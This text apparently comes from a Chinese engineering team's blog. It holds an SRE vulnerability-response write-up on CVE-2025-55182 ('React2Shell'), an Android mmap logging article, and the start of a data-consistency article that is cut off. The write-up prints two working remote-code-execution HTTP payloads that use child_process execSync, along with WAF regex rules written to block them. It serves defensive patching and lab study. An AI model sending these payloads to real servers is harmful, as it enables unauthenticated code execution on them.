查询方式：NVD关键词搜索（产品名 + 版本号）

筛选条件：NVD仅显示高危（HIGH）和严重（CRITICAL）漏洞

评分优先级：NVDCVSS v3.1 > v3.0 > v2.0

速率限制：NVD每 6 秒一次请求（NVD 无 API Key 限制）

依赖库：NVDrequests（需通过 pip3 install requests安装）


注意事项：


脚本需与 services-versions.json放在同一目录
如需更高频率查询，可申请 NVD API Key
查询结果可能存在误报，需结合实际环境判断


2.1.2 扫描频率



定期扫描：NVD每周一上午 9:00 自动执行

临时扫描：NVD重大安全事件发生时立即执行


2.1.3 扫描流程

# 1. 维护服务清单

编辑 services-versions.json，确保版本信息准确


# 2. 执行扫描

python3 scan-vulnerabilities.py


# 3. 查看结果

检查扫描报告，关注高危/严重漏洞（CVSS ≥ 7.0）


2.1.4 扫描结果示例

======================================================================

漏洞扫描报告 - 2026-02-25 10:57:00

======================================================================


 React (19.0.0)

   正在查询 NVD 数据库...

   ⚠️  发现 3 个高危/严重漏洞:


       CVE-2025-55182

         严重程度: CRITICAL (评分: 10.0)

         描述: A pre-authentication remote code execution vulnerability...


======================================================================

扫描完成 - 共发现 3 个高危/严重漏洞

======================================================================


2.1.5 处理决策



无漏洞： 记录扫描日志，归档

发现漏洞： 进入"漏洞分析"阶段


2.2 系统通知（依赖厂商定期推送的高危漏洞清单来发现服务漏洞）

2.2.1 通知来源


厂商安全公告（Google、Oracle、Apache 等）
GitHub Security Advisory
安全社区（CVE、NVD 邮件订阅）
云服务商安全通知（AWS、阿里云等）


2.2.2 通知示例

收到谷歌重要安全通知，发现关于 CVE-2025-55182 的重要安全信息，查看后发现 CVSS 评分高达 10 分（满分），需要立即进行系统调研。



2.2.3 响应流程

收到通知 → 确认是否使用受影响版本 → 进入"漏洞分析"阶段


3. 漏洞分析

3.1 影响范围评估

3.1.1 漏洞基本信息



CVE 编号： CVE-2025-55182

漏洞名称： React2Shell

CVSS 评分： 10.0 / 10.0（满分）

漏洞类型： 远程代码执行（RCE）

CVE 地址： https://www.cve.org/CVERecord?id=CVE-2025-55182

公开时间： 2025-12-03


3.1.2 漏洞描述

CVE-2025-55182，也被称为 "React2Shell"，是 React Server Components 中一个极其严重的远程代码执行漏洞，CVSS 评分达到满分 10.0。利用该漏洞的攻击者可以通过发送单个恶意 HTTP 请求的方式，在无需身份验证的情况下在服务器上执行任意代码。 

漏洞的根本原因是在反序列化过程中缺乏充分的输入验证，导致不安全反序列化漏洞。例如当服务器接收到特制的 React Flight 载荷时，内部反序列化逻辑对其结构验证不足，允许攻击者注入恶意结构，最终导致远程代码执行。
该漏洞在默认配置即可被利用，使得标准部署都面临攻击风险。

3.1.3 受影响版本对比

# 检查本地版本

grep "react" services-versions.json


# 输出：

# "name": "React",

# "product": "react",

# "version": "19.0.0"




3.1.5 内部系统影响



3.2 风险等级判定

3.2.1 评估维度



3.2.2 风险等级定义



P0（紧急）：CVSS ≥ 9.0 且有公开利用代码，影响生产环境

P1（高）：CVSS ≥ 7.0 且影响生产环境

P2（中）：CVSS 4.0-6.9 或仅影响测试环境

P3（低）：CVSS < 4.0 或影响范围极小


3.2.3 处理时效



3.2.4 决策输出（CVE-2025-55182）


[x] 确定风险等级：P0（紧急）
[x] 确定处理负责人：安全团队 + 运维团队
[x] 确定修复截止时间：2026-02-26 14:00
[x] 是否需要应急响应：
是


4. 漏洞处理

4.1 环境搭建

4.1.1 靶机介绍

VulHub (https://vulhub.org/zh) 是一个面向安全研究人员和教育工作者的开源预构建漏洞 Docker 环境集合。旨在帮助安全研究人员、开发人员和运维人员快速搭建各种已知漏洞的实验环境。  

4.1.2 部署搭建（CVE-2025-55182）

# 克隆仓库

git clone --depth 1 https://github.com/vulhub/vulhub.git


# 进入漏洞目录

cd vulhub/react/CVE-2025-55182


# 启动环境

docker compose up -d  


4.1.3 环境要求


使用隔离环境（Docker 容器、虚拟机、Vulhub 靶场）
禁止在生产环境复现漏洞
确保测试环境与生产环境版本一致


4.2 漏洞复现

4.2.1 复现目的


验证漏洞真实性
理解攻击路径
评估实际危害


4.2.2 信息收集（模拟真实攻击路径）

步骤 1：服务识别
通过 Burp Suite 代理访问页面，抓包后发现：
* HTTP 响应头包含 X-Powered-By: Next.js，确认为 Next.js 服务
* 静态文件路径 /_next/static/chunks/是 Next.js 的 React 组件打包的常见路径
* 初步确定此服务为 React 服务



步骤 2：路径扫描

扫描服务高危接口后发现服务只有 /路径是可以访问的，并没有开启其他可访问路径。


步骤 3：漏洞匹配

在奇安信/微步搜索 Next.js 的高危漏洞后发现有 2 个：


CVE-2025-29927：鉴权绕过漏洞，但通过页面分析及路径扫描确认此页面只是普通的 Next.js 说明页面，没有任何登录权限等信息，暂时无法利用
CVE-2025-55182：React 服务本身漏洞，初步判定为此漏洞利用




4.2.3 漏洞验证

尝试 1：使用公开 Payload

利用公开 Payload 验证服务的 CVE-2025-55182 漏洞，虽然攻击失败，但服务返回状态码 500。

# from https://forum.butian.net/article/820 

POST /formaction HTTP/1.1

Host: localhost:3002

Content-Type: multipart/form-data; boundary=----Boundary

Content-Length: 297


------Boundary 

Content-Disposition: form-data; name="$ACTION_REF_0"


------Boundary

Content-Disposition: form-data; name="$ACTION_0:0"


{"id":"vm#runInThisContext","bound":["global.process.mainModule.require(\"child_process\").execSync(\"whoami\").toString()"]}

------Boundary--




结果分析：


返回 500，说明服务页面 /路径虽然只有 GET 请求，但本身已经监听了 POST 请求（否则就返回 404/405）
这说明此服务很有可能使用了 React Server Actions（默认监听 GET、POST 请求）
React Server Actions 是 CVE-2025-55182 的主要攻击面，仍高度怀疑服务存在此漏洞


尝试 2：调整攻击方式（Flight 反序列化）

虽然公开的 payload 攻击失败，但怀疑可能是因为服务本身禁用了 vm.runInThisContext
这类危险模块，或者因为服务本身对 payload 反序列化失败导致 500。

查看 CVE 影响发现 Server Components 也是此漏洞的主要攻击对象，所以这里利用 Flight 反序列化的方式去渗透，发现可以攻击成功，并且可以执行命令 whoami。

# from vulhub

POST / HTTP/1.1

Host: localhost:3000

Next-Action: x

Content-Type: multipart/form-data; boundary=----Boundary

Content-Length: 655


------Boundary

Content-Disposition: form-data; name="0"


{

  "then": "$1:__proto__:then",

  "status": "resolved_model",

  "reason": -1,

  "value": "{\"then\":\"$B1337\"}",

  "_response": {

    "_prefix": "var res=process.mainModule.require('child_process').execSync('whoami').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});",

    "_chunks": "[]",

    "_formData": {

      "get": "$1:constructor:constructor"

    }

  }

}

------Boundary

Content-Disposition: form-data; name="1"


"$@0"

------Boundary

Content-Disposition: form-data; name="2"


[]

------Boundary--




尝试 3：进一步验证

当确定可以执行系统命令后，执行一些普通命令如 (curl) 发现 500 报错，怀疑服务本身是最小安装缺失必要的系统命令。

通过 TCP 的方式访问 DNS Log，发现 DNS Log 存在日志信息，确认可通过此方式发起网络访问。至此就可以证明此服务存在 CVE-2025-55182 漏洞，并且可以执行后台命令。



验证成功标志：


✅ 成功执行系统命令（whoami）
✅ 通过 DNS Log 确认外部网络访问
✅ 证明存在远程代码执行漏洞


4.2.4 记录要求



截图保存：每个关键步骤都需要截图（服务识别、路径扫描、漏洞验证、攻击成功）

请求响应记录：保存所有请求和响应内容，包括失败的尝试

标注说明：对每次尝试标注成功/失败及原因分析

时间戳记录：记录每个操作的时间，便于后续审计和复盘

环境信息：记录测试环境的配置（操作系统、软件版本、网络环境等）


4.3 成因分析

4.3.1 核心问题

过度信任用户输入，React 在反序列化时完全信任用户输入，导致对用户的恶意代码进行了执行。
CVE-2025-55182 存在两种攻击方式： 

 

  1.Server Action 反序列化漏洞：未校验模块导出属性的合法性
 

  2.React Flight 协议反序列化漏洞：缺乏充分的输入验证

4.3.2 技术细节

漏洞类型 1：Server Action 反序列化漏洞

Server Action 是 React 提供的服务端函数调用机制，允许客户端直接调用服务端函数。 

正常数据流：

// 1. 开发者编写 Server Action

// actions.js

export async function updateUser(userId, formData) {

    // 服务端逻辑

    const name = formData.get('name');

    await database.updateUser(userId, { name });

    return { success: true };

}


// 2. 在组件中使用

// UserForm.jsx

import { updateUser } from './actions.js';


export default function UserForm() {

    // 绑定预设参数，创建一个新函数

    // 预设第一个参数为 "user123"

    const boundAction = updateUser.bind(null, "user123");


    return (

        // 表单数据会作为 formData 参数传递

        

            

            

        

    );

}


// 3. 编译后的表单提交

// 当用户提交表单时，React 生成：

$ACTION_REF_0 = ""

$ACTION_0:0 = {

    "id": "actions#updateUser",

    "bound": ["user123"]  // 预设的 userId

}


// 4. 服务端正常处理

// 解析表单数据

const action = {

    id: "actions#updateUser",

    bound: ["user123"]

};


// 加载合法的模块和函数

const [moduleName, functionName] = action.id.split("#");

// moduleName = "actions", functionName = "updateUser"


const moduleExports = require("./actions.js");

const fn = moduleExports["updateUser"];  // 获取真实的 updateUser 函数


// 执行函数

const result = await fn("user123", formData);  // updateUser("user123", formData)  


攻击数据流：

// 1. 攻击者构造恶意载荷

$ACTION_0:0 = {

    "id": "vm#runInThisContext",

    "bound": ["恶意代码"]

}


// 2. 服务端未校验，直接加载

const moduleExports = require("vm");

const fn = moduleExports["runInThisContext"];


// 3. 执行恶意代码

const result = await fn("恶意代码");  // RCE!  


Payload 解析图：



漏洞类型 2：React Flight 协议反序列化漏洞

React Flight 协议说明：


React Flight 是 React 团队开发的协议，用于在服务器和客户端之间传输 React 组件树
它是 React Server Components (RSC) 架构的核心传输层
支持流式传输，允许服务器逐步发送组件数据，客户端可以在接收到部分数据时就开始渲染


工作流程：

1.服务器端：渲染 Server Components，生成 Flight 格式的数据流 

2.传输：通过 HTTP 流或其他传输方式发送数据 

3.客户端：接收并解析 Flight 数据，重构组件树 

4.合并：将服务器渲染的内容与客户端组件结合 

正常数据流示例：

// 1. 服务端代码

// actions.js

export async function sayHello(name) {

  return `Hello, ${name}!`;

}


// page.js（服务端组件）

import { sayHello } from './actions';


export default function Page() {

  return (

    

      

      

    

  );

}


// 2. 初始加载 - 服务端返回 Flight 格式数据

GET /page HTTP/1.1


HTTP/1.1 200 OK

Content-Type: text/x-component


0:{"type":"form","props":{"action":"$1","children":["$2","$3"]}}

1:{"id":"actions#sayHello","bound":[]}

2:{"type":"input","props":{"name":"name","placeholder":"输入姓名"}}

3:{"type":"button","props":{"children":"提交"}}


// 3. 用户提交表单 - 客户端发送 Flight 数据

POST /page HTTP/1.1

Content-Type: multipart/form-data; boundary=----Boundary


------Boundary

Content-Disposition: form-data; name="$ACTION_0:0"

{"id":"actions#sayHello","bound":[]}

------Boundary

Content-Disposition: form-data; name="name"

World

------Boundary--


// 4. 服务端处理

// 解析：{"id":"actions#sayHello","bound":[]}

// 加载：require('./actions')['sayHello']

// 执行：sayHello(formData) // formData.get('name') = 'World'

// 结果："Hello, World!"


攻击数据流 - Flight 协议 Payload 解析：

攻击者通过构造特殊的 Flight 协议载荷，利用原型链污染和构造函数注入：


攻击载荷通过以下方式实现 RCE：
1.利用 proto污染原型链 

2.通过 constructor:constructor访问 Function 构造函数 

3.在 _prefix字段中注入恶意 JavaScript 代码 

4.服务端反序列化时执行恶意代码  

4.3.3 对比分析


4.3.4 根本原因总结 



核心缺陷：

1.Server Action：请求时未校验模块导出属性的合法性，攻击者可通过操控请求负载访问原型链上的危险方法（如 vm.runInThisContext） 

2.React Flight 协议：在反序列化过程中缺乏充分的输入验证，允许原型链污染和构造函数注入 

3.信任边界缺失：完全信任客户端传入的模块名和函数名，没有白名单机制  

4.4 修复方案

4.4.1 临时缓解措施（针对 CVE-2025-55182）

方案 1：WAF 规则配置

# Nginx 配置示例 - 拦截包含恶意特征的请求

location / {

    # 检测请求体中的危险模块调用

    if ($request_body ~* "vm#runInThisContext") {

        return 403;

    }


    # 检测原型链污染特征

    if ($request_body ~* "__proto__|constructor:constructor") {

        return 403;

    }


    # 检测 Flight 协议攻击特征

    if ($request_body ~* "_prefix.*require.*child_process") {

        return 403;

    }


    proxy_pass http://backend;

}


方案 2：访问控制

# 限制 Server Actions 端点仅内网访问

# 在防火墙或负载均衡器配置 IP 白名单

# 示例：仅允许内网 IP 段访问

allow 10.0.0.0/8;

allow 172.16.0.0/12;

allow 192.168.0.0/16;

deny all;  


方案 3：功能降级

// next.config.js - 临时禁用 Server Actions

module.exports = {

  experimental: {

    serverActions: false,  // 禁用 Server Actions

  },

}


注意：临时缓解措施只能降低风险，无法彻底解决问题，必须尽快升级到安全版本。

4.4.2 版本升级方案（推荐）

升级 Next.js
（针对 CVE-2025-55182）：

npm install next@14.2.35  # for 13.3.x, 13.4.x, 13.5.x, 14.x

npm install next@15.0.7   # for 15.0.x

npm install next@15.1.11  # for 15.1.x

npm install next@15.2.8   # for 15.2.x

npm install next@16.0.10  # for 16.0.x  


升级 React 相关包：

npm install react@latest

npm install react-dom@latest

npm install react-server-dom-parcel@latest

npm install react-server-dom-webpack@latest  


其他框架升级指南：

Redwood SDK：  

# 确保使用 rwsdk 版本 >= 1.0.0-alpha.0

npm install react@latest react-dom@latest react-server-dom-webpack@latest  


Waku：  

# 升级到最新版本

npm install react@latest react-dom@latest react-server-dom-webpack@latest waku@latest  


React Native：  

# 对于未使用 monorepo 的 React Native 用户

# react 版本应该在 package.json 中固定，无需其他步骤


# 如果在 monorepo 中使用 React Native

# 只需更新已安装的受影响软件包

npm install react-server-dom-webpack@latest

npm install react-server-dom-parcel@latest

npm install react-server-dom-turbopack@latest  


官方修复公告：https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components

4.4.3 升级步骤（CVE-2025-55182 实施）

# 1. 备份当前版本

npm list react react-dom

# react@19.0.0

# react-dom@19.0.0


# 2. 在测试环境升级到安全版本

npm install react@19.2.2 react-dom@19.2.2


# 3. 执行测试

npm test


# 4. 功能回归测试

# - 测试核心业务功能

# - 测试 Server Components 功能

# - 测试 Server Actions 功能


# 5. 生产环境发布

# 灰度发布 → 观察 1 小时 → 全量发布


4.4.4 回滚方案

# 如果升级后出现问题，立即回滚到原版本

npm install react@19.0.0 react-dom@19.0.0


# 重启服务

pm2 restart app  


5. 验证与总结

5.1 修复验证

5.1.1 验证方法（CVE-2025-55182）

# 1. 版本确认

npm list react react-dom

# react@19.2.2 ✅

# react-dom@19.2.2 ✅


# 2. 漏洞扫描

python3 scan-vulnerabilities.py

# 输出：✅ 未发现高危漏洞


# 3. 功能测试

npm test

# 所有测试通过 ✅


# 4. 安全测试（使用之前的 PoC 验证）

# 发送恶意 payload，应返回错误或被拦截

curl -X POST http://localhost:3000/ \

  -H "Next-Action: x" \

  -F "0={恶意payload}"

# 预期结果：403 Forbidden 或 400 Bad Request ✅


5.1.2 验证结果（CVE-2025-55182）


[x] 版本已更新：react@19.2.2 ✅
[x] 漏洞扫描通过：未发现 CVE-2025-55182 ✅
[x] 功能测试通过：所有业务功能正常 ✅
[x] 安全测试通过：PoC 攻击被拦截 ✅


5.2 文档归档

5.2.1 归档内容

漏洞处理报告/

├── CVE-2025-55182-React-RCE.md

├── 复现截图/

│   ├── 01-服务识别.png

│   ├── 02-漏洞验证.png

│   └── 03-攻击成功.png

├── 修复记录/

│   ├── 升级日志.txt

│   └── 测试报告.md

└── 验证报告/

    └── 修复验证.md


5.2.2 处理记录（CVE-2025-55182）



5.3 经验总结

5.3.1 处理总结（CVE-2025-55182）



发现时间：2026-02-25 09:00（系统通知 + 主动扫描）

修复时间：2026-02-25 14:00

处理周期：5 小时

影响范围：生产环境 1 个系统，测试环境 1 个系统

风险等级：P0（紧急）

处理结果：成功修复，无业务影响


5.3.2 经验教训


✅ 双重发现机制（主动扫描 + 系统通知）确保了及时发现
✅ 完整的复现过程帮助深入理解了攻击原理
✅ 测试环境验证避免了生产环境问题
✅ 灰度发布策略降低了升级风险
⚠️ 需要建立更快速的应急响应机制（目标 2 小时内响应）


5.3.3 改进建议


[ ] 增加扫描频率：从每周一次改为每天一次
[ ] 建立安全通知聚合平台，统一接收各厂商通知
[ ] 制定 P0 级漏洞应急响应预案
[ ] 加强依赖版本管理，使用 Dependabot 自动监控
[ ] 每季度进行一次漏洞应急演练


6. 持续改进

6.1 流程优化

6.1.1 定期回顾



频率：每季度进行一次漏洞管理流程回顾

内容：
统计漏洞发现数量、类型、等级分布
分析平均响应时间和修复时间
评估流程执行效率
识别流程瓶颈和改进点


6.1.2 工具优化



扫描工具：
扩展数据源（NVD + OSV + GitHub Advisory）
优化扫描规则，减少误报
增加自动化程度

监控告警：
集成多渠道安全通知（邮件、钉钉、企业微信）
建立漏洞等级自动分类机制


6.1.3 应急响应预案


制定不同等级漏洞的标准处理流程
建立应急联系人机制
准备常见漏洞的快速修复方案模板


6.2 能力建设

6.2.1 安全培训



频率：每月一次

内容：
最新漏洞案例分析
安全编码规范
漏洞复现技术
应急响应流程


6.2.2 实战演练



漏洞复现演练：每季度一次
选择典型漏洞进行复现
团队成员轮流主导
总结经验教训

应急响应演练：每半年一次
模拟 P0 级漏洞发现场景
测试应急响应流程
评估响应速度和处理效果


6.2.3 知识沉淀


建立漏洞知识库，记录所有处理过的漏洞
编写最佳实践文档
分享典型案例和经验


6.3 工具升级

6.3.1 扩展漏洞数据源

# 计划集成的数据源

- NVD (National Vulnerability Database)  # 已集成

- OSV (Open Source Vulnerabilities)      # 待集成

- GitHub Security Advisory               # 待集成

- Snyk Vulnerability Database            # 待集成


6.3.2 自动化修复


研究依赖自动更新工具（Dependabot、Renovate）
建立自动化测试流程
实现灰度发布自动化


6.3.3 漏洞管理平台


建立统一的漏洞管理平台
集成扫描、分析、修复、验证全流程
提供可视化报表和统计分析


7. 附录

7.1 工具清单



漏洞扫描脚本：scan-vulnerabilities.py

服务清单：services-versions.json

靶场环境：Vulhub (https://vulhub.org/)

抓包工具：Burp Suite

DNS Log 平台：用于验证外部网络访问


7.2 参考资源



NVD：https://nvd.nist.gov/

CVE：https://www.cve.org/

GitHub Advisory：https://github.com/advisories

React 安全公告：https://react.dev/blog

OSV：https://osv.dev/


7.3 CVE-2025-55182 参考资料


React 官方安全公告：https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components
CVE 详情：https://www.cve.org/CVERecord?id=CVE-2025-55182
技术分析文章：https://www.wiz.io/blog/nextjs-cve-2025-55182-react2shell-deep-dive
漏洞利用分析：https://forum.butian.net/article/820
Vulhub 靶场：https://github.com/vulhub/vulhub/tree/master/react/CVE-2025-55182


7.4 联系方式



7.5 常见问题

Q1：扫描发现漏洞但无法复现怎么办？

A：可能是误报或环境差异，建议查看 CVE 详情确认影响条件，必要时咨询安全专家。  

Q2：生产环境无法立即升级怎么办？

A：优先采用临时缓解措施（WAF、访问控制），同时制定升级计划。对于 CVE-2025-55182，可以临时禁用 Server Actions 功能。  

Q3：如何判断漏洞的优先级？

A：参考 3.2 风险等级判定，综合考虑 CVSS 评分、可利用性、业务影响等因素。CVE-2025-55182 因 CVSS 10.0 且有公开 PoC，被定为 P0 级。  

Q4：如何确保修复后不会再次出现类似漏洞？

A：


启用自动化依赖更新工具（如 Dependabot）
增加扫描频率
订阅官方安全公告
定期进行安全审计


 

  文档版本：v1.0

 

  编写日期：2026-02-25

 

  下次更新：每季度回顾

作者介绍：


廉帅  资深SRE



WEKOILOG：基于MMAP的高性能 ANDROID日志库
微鲤技术团队 — Wed, 28 Jan 2026 08:08:59 GMT
WeKoiLog 是一套面向线上排障与稳定性治理的 Android 日志方案：Kotlin 统一 API + Native(C++/JNI) 高性能落盘 + 完整的文件管理与上传能力。它的核心价值不只是“写得快”，而是把日志系统做成一套可集成、可替换、可降级、可扩展的基础设施。

1. 需求与痛点

一个“能用”的日志库很容易写：println + 文件追加即可。

但一个“线上可依赖”的日志系统，必须同时满足：


高频写入： 埋点、网络、状态机、关键路径日志持续产生；
低干扰： 不能阻塞主线程，不能制造抖动；
高可靠： 哪怕 Native 失败、磁盘异常，也不能拖垮业务；
可治理： 文件轮转、压缩、清理、查询、上传、统计要成体系；
可扩展： 业务差异化（格式、过滤、上传策略）要可插拔；
可测试： 支持 Mock/替换实现，方便单元测试与灰度。


WeKoiLog 的方案把日志系统拆成三个“可替换的子系统”：

1) 记录（Logger） 

2) 文件管理（FileManager） 

3) 上传（Uploader）

后文会对应到接口与架构设计。

2. 关键选择：为什么日志系统适合 mmap

从工程角度看，日志有几个特点，使它非常适合 mmap：


写入频繁：mmap 的优势会随频次放大（减少系统调用与拷贝）。
顺序追加：日志通常 append，天然适配“线性写指针 + 内存拷贝”。
批量落盘可接受：日志允许“异步写回”，不要求每条都立刻 fsync。
追求低延迟而非强一致：多数场景更关心“不阻塞主线程”。
数据持久化仍可保证：内核 Page Cache + 合理 msync 策略，可以在性能与可靠之间取得平衡。


这也是为什么大量成熟移动端日志方案会落到 mmap + 异步刷盘这条路线上。

3.mmap 工作原理与对比

下面这张图把传统文件 I/O 与 mmap 的差异讲得很直观


3.1 传统文件 I/O 流程

传统文件 I/O 的核心路径：

应用层 -> 用户空间缓冲区 (User Buffer)
   ↓ 数据拷贝
内核空间缓冲区 (Kernel Buffer)
   ↓ 系统调用
文件系统 -> 磁盘


主要问题（与图一致）：


需要两次数据拷贝
频繁系统调用开销大
同步写入容易阻塞线程（尤其是主线程）


3.2 mmap 内存映射流程

mmap 的核心路径：  

应用层 -> 虚拟内存地址 (Virtual Memory)
   ↓ 直接内存访问
页缓存 (Page Cache) <-> 文件
   ↓ 内核自动同步/写回
磁盘


收益点：


零拷贝倾向：写入更像“写内存”
系统调用显著减少：写入阶段仅需 memcpy，flush 可异步
更平滑的 I/O 行为：写回由内核调度，避免业务线程硬刷盘


3.3 性能对比指标



4.mmap 落盘实现要点（open/ftruncate/mmap/memcpy/msync）

实现 mmap 写日志，不只是 mmap() 一行那么简单。要想“快、稳、可控”，通常要注意：


文件预分配：避免写入过程中频繁扩容与碎片化
写指针管理：顺序写 offset，避免越界
同步策略：MSASYNC / MSSYNC 的选择与节流
错误处理：MAP_FAILED、fd 不可用、磁盘满等要兜底
对齐约束：新系统（如 Android 15+）的 page/映射对齐要求


4.1 参考实现

// 1) 打开/创建文件
int fd = open(log_file_path, O_CREAT | O_RDWR, 0644);

// 2) 预分配文件大小（映射区域）
ftruncate(fd, mmap_size);

// 3) 建立映射（共享映射，便于落盘）
char* mapped = (char*)mmap(  
    nullptr,
    mmap_size,
    PROT_READ | PROT_WRITE,
    MAP_SHARED,
    fd,
    0
);

// 4) 写入：把日志拷贝到映射区域
memcpy(mapped + write_offset, log_data, log_length);  
write_offset += log_length;

// 5) 同步：推荐异步避免阻塞
msync(mapped, write_offset, MS_ASYNC);

// 6) 清理
munmap(mapped, mmap_size);  
close(fd);  


4.2 Android 15+：16KB 对齐

Android 15+ 需要 16KB 对齐，可用如下工具函数：  

static size_t align_to_16kb(size_t size) {  
    constexpr size_t ALIGNMENT_SIZE = 16 * 1024;
    return (size + ALIGNMENT_SIZE - 1) & ~(ALIGNMENT_SIZE - 1);
}


4.3 msync 选择：MSASYNC vs MSSYNC


MS_ASYNC：把写回工作交给内核异步执行，更适合日志（不阻塞业务线程）。
MS_SYNC：同步刷盘，适合“必须立刻落盘”的少量关键点，但要谨慎使用，避免卡顿。
默认 ASYNC + 定时/退出/崩溃前关键点进行一次更强的 flush（具体策略可在 ILogger 层封装）。


5.三层架构：Facade / Manager / Implementation

方案的架构设计分为三层，并明确每层的设计模式与职责：

门面层：WeKoiXLog（Facade Pattern）


对外提供 统一、简洁 的静态 API
隐藏内部复杂性
Kotlin object 单例，使用成本低
管理层：LogManager（Singleton + Strategy）
统一管理三大能力：日志记录 / 文件管理 / 上传
线程安全单例
支持运行时组件替换（Strategy 的落点）
实现层：Implementation（Adapter + Strategy）
具体功能实现（如 XLogAdapter、FallbackLogger）
基于接口编程，支持自定义实现
可插拔替换，便于扩展与测试


6.核心接口：ILogger / IFileManager / IUploader

在“职责分离与扩展性”上给出了明确的接口分层：


6.1 ILogger：日志记录（核心职责 + 可扩展能力）

核心职责：日志记录


6 个日志级别：V/D/I/W/E/F
配置管理：级别、模式、过滤器
扩展能力：格式化器、统计信息


一个实用的接口形态如下：

interface ILogger {  
    fun init(config: LogConfig): Boolean
    fun close()
    fun flush()

    fun v(tag: String, message: String, throwable: Throwable? = null)
    fun d(tag: String, message: String, throwable: Throwable? = null)
    fun i(tag: String, message: String, throwable: Throwable? = null)
    fun w(tag: String, message: String, throwable: Throwable? = null)
    fun e(tag: String, message: String, throwable: Throwable? = null)
    fun f(tag: String, message: String, throwable: Throwable? = null)

    // 扩展：过滤、格式化、统计等
    fun setLogLevel(level: LogLevel)
    fun setAppenderMode(mode: AppenderMode)
    fun setLogFilter(filter: LogFilter)
    fun setLogFormatter(formatter: LogFormatter)
    fun getLogStats(): LogStats
}


6.2 IFileManager：文件管理（查询/轮转/压缩/清理/统计）

方案强调 FileManager 不只是“拿到路径”，而是覆盖整个文件生命周期：


文件查询：按时间范围、按日期
文件操作：轮转、压缩、清理
统计信息：文件数量、总大小


可落地的关键 API：

interface IFileManager {  
    fun init(config: LogConfig): Boolean
    fun close()

    fun getCurrentLogPath(): String
    fun getAllLogFiles(): List
    fun getLogFilesByTimeRange(startTime: Long, endTime: Long): List
    fun getLogFilesByDate(dateStr: String): List

    fun shouldRotateFile(): Boolean
    fun rotateFile(): Boolean

    fun compressLogFile(filePath: String): String?
    fun cleanupOldFiles(maxAgeDays: Int): Int

    fun getFileStats(): FileStats
}


6.3 IUploader：日志上传（单文件/批量/时间范围 + 回调 + 策略）

Uploader 的职责在方案里也很明确：


上传方式：单文件、批量、时间范围
回调机制：成功/失败通知
配置管理：重试、超时、压缩


interface IUploader {  
    fun uploadFile(filePath: String, callback: UploadCallback)
    fun uploadFiles(filePaths: List, callback: UploadCallback)
    fun uploadFilesByTimeRange(startTime: Long, endTime: Long, callback: UploadCallback)

    fun setUploadConfig(config: UploadConfig)
    fun getUploadConfig(): UploadConfig?
}


7.可靠性终极保障：智能降级（FallbackLogger）

日志系统最怕两件事：

1) Native/底层不可用导致崩溃 

2) 日志线程阻塞主线程造成卡顿

WeKoiLog 在方案里给出了“智能降级机制”，把风险隔离开： 



7.1 四阶段流程（检测→决策→降级→透明）


检测阶段：XLogAdapter 类加载时尝试加载 Native 库，并记录状态
决策阶段：LogManager 初始化时检查状态，决定使用哪个实现
降级阶段：加载失败自动切到 FallbackLogger
透明阶段：对业务方无感知，调用保持一致


7.2 FallbackLogger 的设计约束

方案里对 FallbackLogger 的约束非常工程化：


空实现策略：所有方法不执行任何操作（或最轻量实现）
零阻塞：确保不会阻塞主线程
异常安全：完善异常处理，避免崩溃
接口一致：实现 ILogger，可无缝替换
一句话总结：


宁可不记录，也不能影响主业务。

8. 配置模型与使用方式（quickInit / init / 运行时替换）

8.1 门面 API：quickInit + 统一入口

门面层 API 让接入成本非常低：

WeKoiXLog.quickInit(context)  
WeKoiXLog.i("TAG", "message")  
WeKoiXLog.e("TAG", "error", throwable)  


8.2 可配置 init：把“策略”显式化

在方案里，init 支持传入：日志目录、缓存目录、文件名前缀、级别、是否控制台输出、AppenderMode（同步/异步）、Debug 开关、最大保留时间，以及自定义实现注入（logger/fileManager/uploader）。

WeKoiXLog.init(  
    context = context,
    logDir = "...",
    cacheDir = "...",
    namePrefix = "app",
    level = LogLevel.INFO,
    consoleLogEnabled = true,
    appenderMode = AppenderMode.ASYNC,
    debugLogEnabled = false,
    maxAliveTime = 0,
    loggerImpl = null,
    fileManagerImpl = null,
    uploaderImpl = null
)


工程建议：把 AppenderMode（SYNC/ASYNC）做成运行时可切换，在“崩溃前/关键流程”可临时提高落盘强度。

8.3 运行时替换：便于灰度与测试

管理层支持替换实现，典型用途：


单元测试用 MockLogger
灰度阶段替换为“更保守”的实现
A/B 比较不同格式化/过滤策略


9. 性能测试：数据、方法与解读

方案给了完整测试环境与结果：


9.1 测试条件


设备：Xiaomi 12 Pro（Android 13）
场景：连续写入 10,000 条日志
单条长度：平均 200 字符


9.2 结果表格（转写）



9.3 如何解读这些数据


5x 写入提升：主要来自减少系统调用、减少拷贝、写回异步化。
CPU -50%：传统 I/O 需要频繁进入内核态与拷贝；mmap 以 memcpy 为主。
内存 -30%：更少的缓冲区/拷贝链路，且写入路径更可控。
主线程 0ms：异步模式下，避免同步刷盘卡住关键线程。


10. 总结与展望

本方案优势归纳为四类：性能、可靠、扩展、易用；我们把它翻译成工程语言就是：


性能：mmap 零拷贝写入 + Native C++ 路径，解决高频日志的系统开销问题。
可靠：智能降级确保底层不可用时仍不影响业务。
扩展：接口隔离 + 依赖倒置，组件可替换，满足不同业务场景。
易用：门面 API + quickInit + 清晰配置，接入与维护成本低。



作者介绍：


王峰  资深Android开发工程师



从Impala到Apache Doris：业务数据一致性问题的解决之道
微鲤技术团队 — Wed, 28 Jan 2026 08:08:41 GMT
一、背景：实时化需求下的架构演进

在当今数据驱动的业务环境中，实时的数据洞察能力已成为企业竞争力的关键要素。某核心业务的积分与等级体系，作为用户激励和运营管理的重要抓手，其数据的准确性和时效性直接影响业务决策的有效性。 

最初，该业务的积分计算采用成熟的T+1离线处理模式，数据团队每日凌晨批量处理前一日的数据。这种模式虽然稳定可靠，但随着业务发展，次日才能看到数据的延迟已无法满足运营团队对实时反馈的需求。运营方明确提出："我们需要分钟级的数据更新能力，以便实时调整策略和响应用户行为。" 

为响应这一需求，数据架构团队启动了架构升级项目，将原有的T+1 Hive任务改造为分钟级调度，并继续使用原本表现优异的Impala作为查询引擎。然而，这次看似平滑的技术升级，却引发了一场意想不到的数据事故。

二、问题与现状：诡异的数据回滚现象

新系统上线后，业务端开始收到用户反馈：积分数据会在某些时刻突然下降，几分钟后又自动恢复。这种"数据幽灵"现象严重影响了用户信任和运营决策。

问题排查过程

